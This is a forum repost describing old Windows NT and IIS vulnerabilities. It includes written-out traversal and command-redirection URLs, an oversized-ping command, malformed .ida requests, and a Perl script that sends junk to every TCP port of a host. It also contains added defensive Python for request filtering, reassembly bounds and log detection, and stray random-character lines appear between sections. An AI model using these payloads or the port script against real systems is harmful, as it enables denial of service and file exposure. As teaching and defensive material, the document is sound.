


Title: NT vulnerabilities and their descriptions (English)

Author: 雜七雜八    Time: 2011-1-13 17:12
Affected systems: NT 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: NT 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

In both forms the remainder of the URL reaches the command interpreter that runs the batch file, so the '>' redirection (and the CR/LF in the second form) is interpreted as part of the command line rather than as part of a file name.
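The '..\..' traversal above and the '>PATH\target.bat' redirection tail are both caught by resolving the request path the way the NT file system will, and by checking for command-interpreter characters before any permission decision is made. The following is an added example in Python, not code from the original post; the virtual-directory table, the permission names and the sample URLs other than the two quoted above are assumptions made for the example.

```python
"""Added example, not part of the original post: a request filter for the
NT/IIS request shapes described above. The virtual-directory table and the
permission names are assumptions made for the example."""
from urllib.parse import unquote

# Constructed virtual-directory table: path prefix -> permission granted there.
VIRTUAL_DIRS = {"/": "read", "/scripts": "execute"}

# Characters cmd.exe acts on if they reach the command line of a .bat script.
SHELL_METACHARS = frozenset("<>|&\r\n")


def canonicalise(raw_path):
    """Decode the request path and resolve it the way the NT file system would.

    Returns (canonical_path, escaped). Both separators count, '%2e%2e' is
    decoded before '..' is looked for, and trailing dots and spaces are
    stripped from each component because Win32 does so ('scripts..' names the
    'scripts' directory). escaped is True when a '..' climbs above the root.
    """
    decoded = unquote(raw_path).replace("\\", "/")
    stack, escaped = [], False
    for segment in decoded.split("/"):
        if segment == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
            continue
        name = segment.rstrip(". ")
        if name:
            stack.append(name)
    return "/" + "/".join(stack), escaped


def permission_for(path):
    """Longest matching virtual directory of the *resolved* path decides."""
    path = path.lower()
    matches = [d for d in VIRTUAL_DIRS
               if path == d or path.startswith(d.rstrip("/") + "/")]
    return VIRTUAL_DIRS[max(matches, key=len)]


def naive_permission(raw_path):
    """The mistake: deciding on the raw request string before resolution.
    '/scripts..\\..\\scriptname' starts with '/scripts', so it looks executable."""
    matches = [d for d in VIRTUAL_DIRS if raw_path.lower().startswith(d)]
    return VIRTUAL_DIRS[max(matches, key=len)]


def authorize(raw_path):
    """Return (decision, reason, canonical_path, permission) for one request."""
    decoded = unquote(raw_path)
    bad = "".join(sorted(SHELL_METACHARS.intersection(decoded)))
    if bad:
        return "deny", "shell metacharacters %r" % bad, None, None
    canonical, escaped = canonicalise(raw_path)
    if escaped:
        return "deny", "escapes content root", None, None
    return "allow", "ok", canonical, permission_for(canonical)


if __name__ == "__main__":
    for url in ("/..\\..", "/scripts..\\..\\scriptname",
                "/scripts/exploit.bat>PATH\\target.bat",
                "/scripts/script_name%0A%0D>PATH\\target.bat",
                "/scripts/hello.bat"):
        print("%-45s naive=%-8s %s" % (url, naive_permission(url), authorize(url)))
```

The '/scripts..\..\scriptname' line makes the point: a prefix match on the raw request string grants execute, while the resolved path '/scriptname' only sits under the read-only root, so the permission has to be decided on the canonical path. The metacharacter check runs first, on the decoded string, which is why '%0A%0D' is caught as CR/LF.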
----------------------------------------------------------------------
      3 v4 P# l: C) y& b. V! o. f* i+ Z/ L; J2 Y( n
Affected systems: NT 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual processor time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script, gleaned from postings on the NTsecurity@iss.net list, to test the ports on your own system (Perl is available from the NT Resource Kit):

/*begin poke code*/

#!/usr/bin/perl
# poke - connect to every TCP port on a host, send about ten characters
# followed by a carriage return, and disconnect (the manual telnet test
# above, automated). Uses IO::Socket::INET, which ships with Perl, in place
# of the old chat2.pl library the original script required.
use strict;
use warnings;
use IO::Socket::INET;

my $systemname = shift @ARGV or die "usage: perl poke servername\n";

my $verbose    = 1;   # tell me what you're hitting
my $knownports = 1;   # don't hit known problem ports (53, 135, 1031)

for (my $port = 1; $port <= 65535; $port++) {
    next if $knownports && ($port == 53 || $port == 135 || $port == 1031);

    print "Trying port: $port\n" if $verbose;

    # Most ports are closed; skip them instead of dying on the connect.
    my $fh = IO::Socket::INET->new(
        PeerAddr => $systemname,
        PeerPort => $port,
        Proto    => 'tcp',
        Timeout  => 2,
    ) or next;

    print $fh "This is about ten characters or more\r\n";
    close $fh;
}

/*end poke code*/

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: NT 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <CR>, will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error. The error occurred on date @ time. The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT)"

(Exception code c0000005 is STATUS_ACCESS_VIOLATION, i.e. inetinfo dereferenced an invalid address while handling the request.)

--------------------------------------------------------------------------------

Affected systems: NT 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0x0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

Why 65527 is large: 65527 bytes of ICMP data plus the 8-byte ICMP header and the 20-byte IP header come to 65555 bytes, more than the 65535 bytes a 16-bit IP total length can describe, so the datagram only exists as fragments, and a reassembler that does not bound the fragment offset plus length overruns its buffer.

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
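The arithmetic behind the '-l 65527' figure and the bound a fragment reassembler must enforce, as an added example in Python that is not from the original text; the Ethernet MTU used for fragmenting is an assumption.

```python
"""Added example, not part of the original text: how an oversized ping is
fragmented and the check that keeps reassembly inside a 65535-byte datagram.
The MTU is an assumption (Ethernet)."""
IP_HEADER_LEN = 20
ICMP_HEADER_LEN = 8
MAX_DATAGRAM = 65535                           # IP total length is a 16-bit field
MAX_PAYLOAD = MAX_DATAGRAM - IP_HEADER_LEN     # 65515 bytes after the IP header
MAX_PING_DATA = MAX_PAYLOAD - ICMP_HEADER_LEN  # 65507: the largest legal 'ping -l'
MTU = 1500                                     # constructed: Ethernet link


def fragment(icmp_data_len, mtu=MTU):
    """Fragment an ICMP echo carrying icmp_data_len bytes of data as a sender
    does. Returns [(offset_field, payload_len, more_fragments)], where
    offset_field is the 13-bit IP fragment offset in 8-byte units."""
    payload = ICMP_HEADER_LEN + icmp_data_len   # everything after the IP header
    chunk = (mtu - IP_HEADER_LEN) // 8 * 8      # non-final fragments: multiple of 8
    fragments, offset = [], 0
    while offset < payload:
        length = min(chunk, payload - offset)
        more = offset + length < payload
        fragments.append((offset // 8, length, more))
        offset += length
    return fragments


def reassemble_check(fragments):
    """Return (accepted, reassembled_total_length).

    A safe reassembler rejects any fragment whose end (offset + length) lies
    beyond MAX_PAYLOAD: a reassembly buffer sized for the largest datagram a
    16-bit total length can describe would otherwise be overrun by the data
    of the last fragment. The classic Ping of Death is a reassembler that
    lacks this check.
    """
    end = 0
    for offset_field, length, _more in fragments:
        start = offset_field * 8
        if start + length > MAX_PAYLOAD:
            return False, IP_HEADER_LEN + start + length
        end = max(end, start + length)
    return True, IP_HEADER_LEN + end


if __name__ == "__main__":
    for data_len in (32, MAX_PING_DATA, 65527):
        frags = fragment(data_len)
        ok, total = reassemble_check(frags)
        print("ping -l %5d: %2d fragments, reassembled %5d bytes -> %s"
              % (data_len, len(frags), total, "accept" if ok else "REJECT"))
```

With the Ethernet MTU the 65527-byte ping becomes 45 fragments; the last one starts at byte 65120 and carries 415 bytes, so its end at 65535 exceeds the 65515 bytes of payload that fit under a 20-byte header, and a bounded reassembler drops it instead of writing past its buffer. 65507 bytes of data is the largest size that passes.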
--------------------------------------------------------------------------------
      , A) x6 i' z4 {  K5 b$ T. Z9 C
Microsoft IIS 5.0 has problems handling a specific form of URL ending in "ida". The problem can have two kinds of result. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively a denial of service against the server). Vulnerable are all IIS versions up to and including IIS 5.0. When a remote attacker requests the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------
      " N  R& W% K/ ~( z2 \% k: p4 c
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ or IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge of how the web site is organized and of the directory structure of the server.
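The two .ida/.idq cases above leave the same fingerprints in the web server log: requests for those two extensions, and abnormally long URI stems. The following is an added example in Python, not from the original text, of that detection run over constructed IIS W3C extended log lines; the addresses, timestamps, the 25 KB probe line and the length threshold are all assumptions made for the example.

```python
"""Added example, not part of the original text: detection of .ida/.idq
probes over constructed IIS W3C extended log lines."""
LONG_URI = 1024   # assumption: no legitimate request path on this site is longer

# Constructed sample log. The third request carries a 25 KB run of dots ending
# in 'ida', the malformed URL described above; it is built here rather than
# written out in full.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-06-20 10:01:02 192.0.2.10 GET /default.htm - 200",
    "2001-06-20 10:01:05 192.0.2.77 GET /anything.idq - 404",
    "2001-06-20 10:01:09 192.0.2.77 GET /" + "." * 25000 + "ida - 500",
    "2001-06-20 10:02:11 192.0.2.10 GET /scripts/search.idq CiRestriction=nt 200",
])


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            records.append(dict(zip(fields, line.split())))
    return records


def detect(records):
    """Return (client_ip, rule, status, uri_excerpt) for each suspicious request."""
    alerts = []
    for rec in records:
        stem = rec.get("cs-uri-stem", "")
        ext = stem.rsplit(".", 1)[-1].lower() if "." in stem else ""
        status = rec.get("sc-status", "")
        excerpt = stem[:40]
        if ext in ("ida", "idq"):
            # Any hit on the Index Server ISAPI extensions: the error text for
            # a missing file carries the physical path, and the long form
            # above can take inetinfo down.
            alerts.append((rec["c-ip"], "idq-ida-request", status, excerpt))
        if len(stem) > LONG_URI:
            alerts.append((rec["c-ip"], "oversized-uri", status, excerpt))
    return alerts


if __name__ == "__main__":
    for ip, rule, status, excerpt in detect(parse_w3c(SAMPLE_LOG)):
        print("%-12s %-18s %s %s" % (ip, rule, status, excerpt))
```

The rule fires on every .ida/.idq request on purpose: on a server that does not use Index Server there is no legitimate reason for the extension to appear at all, and on one that does, the status code and the stem length separate the search page from a probe. The 25 KB line trips both rules.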




Welcome to 汶上信息港 (http://www.loveproblemguru.com/) Powered by Discuz! X3.5